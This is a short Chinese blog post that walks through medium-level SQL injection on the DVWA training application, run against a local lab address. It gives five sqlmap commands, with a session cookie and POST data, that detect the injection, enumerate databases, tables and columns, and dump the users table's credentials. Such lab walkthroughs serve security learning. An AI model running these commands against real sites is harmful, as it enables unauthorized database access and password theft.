DVWA 之medium级别sql注入
2024-10-07 22:55:11
中级注入的提交方式从get请求改为post请求,可以用burp抓包注入或抓注入点
1 . 判断是否有注入
sqlmap -u "http://192.168.242.1/dvw/vulnerabilities/sqli/" --cookie="security=medium; PHPSESSID=svb0idqkd55tee4mbckj3ejht5" --data "id=2&Submit=Submit"
2. 爆数据库名
sqlmap -u "http://192.168.242.1/dvw/vulnerabilities/sqli/" --cookie="security=medium; PHPSESSID=svb0idqkd55tee4mbckj3ejht5" --data "id=2&Submit=Submit" –dbs
3. 爆数据库的表
sqlmap -u "http://192.168.242.1/dvw/vulnerabilities/sqli/" --cookie="security=medium; PHPSESSID=svb0idqkd55tee4mbckj3ejht5" --data "id=2&Submit=Submit" –tables –D “dvwa”
4 . 爆数据库表的字段
sqlmap -u "http://192.168.242.1/dvw/vulnerabilities/sqli/" --cookie="security=medium; PHPSESSID=svb0idqkd55tee4mbckj3ejht5" --data "id=2&Submit=Submit" –columns –D “dvwa” –T “users”
5.爆账号密码
sqlmap -u "http://192.168.242.1/dvw/vulnerabilities/sqli/" --cookie="security=medium; PHPSESSID=svb0idqkd55tee4mbckj3ejht5" --data "id=2&Submit=Submit" --dump -D "dvwa" -T "users" -C "user,password"
最新文章
- JavaScript通过元素id和name直接获取元素的方法
- linux下core dump【总结】
- vim基础命令
- Tornado 异步客户端
- 使用CocoaPods管理第三方开源类库
- HTTP长连接短连接
- 关于MYSQL group by 分组按时间取最大值的实现方法!
- CRC32 vs Java.HashCode
- OpenGL【2 坐标转换】
- discuz相关总结
- react-native 导航器 react-navigation 3.x 使用
- NOIP2016 巨凉无比的感言
- 2845 ACM 豆子 beans
- Eclipse java项目将普通文件转化为Source文件的操作
- 将目录结构输出为json格式(zTree)
- http put post请求区别
- Filebeat配置paths里,不支持递归所有子目录
- 辛星和你彻底搞清CSS中的相对定位和绝对定位
- Android自动化测试工具之—UiAutomator环境配置
- C++ 无限定名称查找
热门文章
- 在类中,调用这个类时,用$this->;video_model是不是比每次调用这个类时D('Video')效率更高呢
- System.Web.Mvc.RouteAttribute.cs
- Eclipse_断点设置不起作用
- 「APIO 2019」奇怪装置
- 侧滑关闭Activity的解决方案——SwipeBackLayout
- spark 应用场景2-身高统计
- 编写main方法
- Python全栈开发:XML与parse对比
- 安装tomcat8.5
- JavaWeb读取资源文件的四种方式